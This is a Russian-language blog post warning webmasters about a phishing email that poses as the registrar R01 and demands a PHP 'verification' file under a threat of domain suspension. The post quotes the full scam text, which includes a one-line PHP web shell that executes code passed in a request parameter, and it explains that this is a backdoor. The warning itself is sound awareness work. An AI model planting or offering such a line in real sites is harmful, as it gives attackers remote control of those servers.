письмо мошенников

Большинство веб-мастеров вполне законопослушные люди, чем уже не раз пользовались мошенники. Буквально на днях и меня хотели «купить» на мякине, прислав письмо, типа, от R01, в котором просили подтвердить, «что фактическое управление доменным именем zegeberg.ru осуществляется лицом, указанным в качестве его администратора». Ниже приведён полный текст мошеннической рассылки.

Текст письма

Уважаемый клиент! В соответствии с дополнениями, внесенными в регламент ICANN, Вы должны подтвердить, что фактическое управление доменным именем zegeberg.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменным именем, создайте в корневой директории сайта файл a1nqcmh82cqh2drd.php со следующим содержимым:

<?php assert(stripslashes($_REQUEST[R01])); ?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 17 июня 2017 года, 13:00 (UTC+03:00), в противном случае процедура верификации не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено. Отправитель R01.RU no-replyСобака01.ru

Мысли мои сразу дёрнулись, потом застыли и дали ход назад. Алгоритм извилин был такой:

  1. Что-то новое с регистрацией доменов,
  2. Может вставить?
  3. Да ну нафиг (приходит отрезвление),
  4. Да пошли они (полная трезвость).

Что делать

Правильными оказались пункты 4 и 5. Запомните, а лучше запишите на стене возле рабочего компьютера:

Никто не имеет права требовать размещения на вашем сайте стороннего кода!

Ни регистратор, ни хостер не имеют этого права!

В некоторых случаях, например, при подтверждении прав на сайт в панели веб-мастера Яндекс и Google вам могут предложить варианты, среди которых и временное размещение кода, но требовать не может никто.

Через такой код на сайт размещается шелл, через который можно лить, что душе угодно. Левые ссылки, скрытый текст, всплывающая реклама – да всё, что угодно.

Ни в коем случае не размещайте на сайте никакой код с почтовой рассылки, иначе потом запаритесь платить за очистку сайта и вытягивать его из бана. Также учтите:

Текст рассылки мошенников может меняться, суть одна – вас просят разместить на сайте некий код.

Паниковский

 

Подача может идти под любым соусом, вам могут давать ссылки на некие законодательные акты и прочую хрень (мошенники не дураки). Они не напишут словами Паниковского:

«Положите во дворе под мусорный ящик шестьсот рублей, иначе будет плохо».

Короче, надеюсь, вы меня услышали – никакого кода, под каким бы соусом он не был подан. 

Добавить комментарий


Защитный код
Обновить